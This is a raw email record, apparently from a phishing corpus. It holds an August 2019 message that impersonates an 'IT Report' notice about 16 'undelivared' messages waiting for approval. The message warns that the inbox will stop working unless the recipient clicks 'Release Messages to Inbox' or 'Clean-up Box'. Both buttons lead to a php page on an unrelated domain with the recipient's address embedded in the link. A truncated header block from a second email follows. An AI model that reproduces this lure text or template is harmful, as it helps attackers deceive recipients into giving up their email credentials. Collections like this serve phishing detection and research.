From: "IT Report"<veysel@zentralelectric.com>
To: jose@monkey.org
Subject: Undeliverable_Emails:
Date: 29 Aug 2019 04:42:39 +0200
Message-ID: <20190829044238.9FF8ADD4F04DC7DF@zentralelectric.com>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Easynet-ES-Outgoing-Spam-Score: 0.1 (/)
X-Outgoing-Spam-Report: Spam detection software, running on the system "aspam2.nsa.es.easynet.net", has
 identified this incoming email as possible spam.  The original message
 has been attached to this so you can view it (if it isn't spam) or label
 similar future email.  If you have any questions, see
 @@CONTACT_ADDRESS@@ for details.
 
 Content preview:  Email: jose@monkey.org , You have {16} undelivared messages
    clustered on your cloud, awaiting approval from you to be delivared. please
    note, this is likely to cause inbox to cease function in incoming messages,
    follow this instruction: [...] 
 
 Content analysis details:   (0.1 points, 0.0 required)
 
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
 -1.0 ALL_TRUSTED            Passed through trusted hosts only via SMTP
  0.0 HTML_MESSAGE           BODY: HTML included in message
  1.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
X-Outgoing-SpamScan-Signature: 39d0b6dc95dc533a05a81d2341ce9078
X-Easynet-bounce-key: easynet.es;veysel@zentralelectric.com;1567046511;9ea8cfb4;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 164

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.=
w3.org/TR/html4/loose.dtd">

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.19400"></HEAD>
<body style=3D"MARGIN: 0.5em">
<P>
<SPAN style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI"=
, "Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: nor=
mal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(=
33,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: norma=
l; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligat=
ures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; te=
xt-decoration-style: initial;=20
text-decoration-color: initial'>Email:<SPAN>&nbsp;</SPAN></SPAN>
<SPAN style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI"=
, "Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: nor=
mal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(=
34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: norma=
l; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligat=
ures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; te=
xt-decoration-style: initial;=20
text-decoration-color: initial'><FONT color=3D#073763>jose@monkey.org</FONT=
><FONT color=3D#212121>&nbsp;,</FONT></SPAN>
<BR style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI", =
"Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33=
,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal;=
 BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatur=
es: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text=
-decoration-style: initial; text-decoration-color:=20
initial'>
<BR style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI", =
"Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33=
,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal;=
 BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatur=
es: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text=
-decoration-style: initial; text-decoration-color:=20
initial'>
<SPAN style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI"=
, "Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: nor=
mal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(=
33,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: norma=
l; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligat=
ures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; te=
xt-decoration-style: initial;=20
text-decoration-color: initial'>You have {16} undelivared messages clustere=
d on your cloud, awaiting approval from you to be delivared.</SPAN>
<BR style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI", =
"Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33=
,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal;=
 BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatur=
es: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text=
-decoration-style: initial; text-decoration-color:=20
initial'>
<BR style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI", =
"Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33=
,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal;=
 BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatur=
es: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text=
-decoration-style: initial; text-decoration-color:=20
initial'>
<SPAN style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI"=
, "Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: nor=
mal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(=
33,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: norma=
l; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligat=
ures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; te=
xt-decoration-style: initial;=20
text-decoration-color: initial'>please note, this is likely to cause inbox =
to cease function in incoming messages, follow this instruction:&nbsp;</SPA=
N>
<BR style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI", =
"Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33=
,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal;=
 BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatur=
es: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text=
-decoration-style: initial; text-decoration-color:=20
initial'></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI", "=
Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: normal=
; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33,=
33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; =
BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligature=
s: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-=
decoration-style: initial; text-decoration-color:=20
initial'><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://fiesta4agua.com=
/tx/XZXXSE345CDC/BBBBBRR4444444/101454858.php?email=3Djose@monkey.org" rel=
=3D"noopener noreferrer" target=3D_blank data-saferedirecturl=3D"https://ww=
w.google.com/url?q=3Dhttps://vodevice.com/64926950bb1f5acd6fc01acc740fd5fe?=
tyid%3Dc3llZC5hcnNoYWRAemFtaWxhbC5jb20%3D&amp;source=3Dgmail&amp;ust=3D1566=
995039324000&amp;usg=3DAFQjCNFrhFFLHIqn4TzbScW-ANnJPzoenw">1. Release Messa=
ges to Inbox</A></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI", "=
Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: normal=
; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33,=
33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; =
BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligature=
s: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-=
decoration-style: initial; text-decoration-color:=20
initial'><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://fiesta4agua.com=
/tx/XZXXSE345CDC/BBBBBRR4444444/101454858.php?email=3Djose@monkey.org" rel=
=3D"noopener noreferrer" target=3D_blank data-saferedirecturl=3D"https://ww=
w.google.com/url?q=3Dhttps://vodevice.com/64926950bb1f5acd6fc01acc740fd5fe?=
tyid%3Dc3llZC5hcnNoYWRAemFtaWxhbC5jb20%3D&amp;source=3Dgmail&amp;ust=3D1566=
995039324000&amp;usg=3DAFQjCNFrhFFLHIqn4TzbScW-ANnJPzoenw">2. Clean-up Box<=
/A></P></BODY></HTML>

From jose@monkey.org Thu Aug 29 23:33:09 2019 +0000
Return-Path: grace_villapando@rmrelectric.com.ph
Delivered-To: jose@monkey.org
X-FDA: 75877068498.54.rule70_55c13da90ca06
X-Spam-Summary: 80,0,0,788e1a37acb3cad4,d41d8cd98f00b204,grace_villapando@rmrelectric.com.ph,:,RULES_HIT:41:72:355:375:379:495:800:962:967:973:983:988:989:1021:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1436:1437:1513:1515:1516:1517:1521:1534:1543:1561:1588:1589:1593:1594:1711:1714:1730:1747:1777:1792:2198:2199:2380:2393:2525:2527:2560:2563:2610:2682:2685:2693:2771:2828:2859:2890:2895:2899:2902:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3867:3868:3870:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4552:5007:6117:6119:6248:6261:6650:6657:6678:7809:7901:8514:8583:8599:8603:8957:9025:9040:9388:10004:10231:10346:11473:11658:11914:12043:12050:12260:12297:12301:12315:12555:12740:12895:12955:12986:13025:13095:13139:13439:14093:14096:14106:14158:14181:14246:14721:14829:14846:14849:21080:21433:21450:21451:21483:21524:21627:21810:21819:21939:30001:30021:30022:30054,0,RBL:149.56.173.70:@rmrelectric.com.ph:.lbl8.mailshell.net-62.
X-HE-Tag: rule70_55c13da90ca06
X-Filterd-Recvd-Size: 3685
Received: from rmrelectric.com.ph (fetorepceamit.com [149.56.173.70])
	by imf05.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 29 Aug 2019 23:33:09 +0000 (UTC)
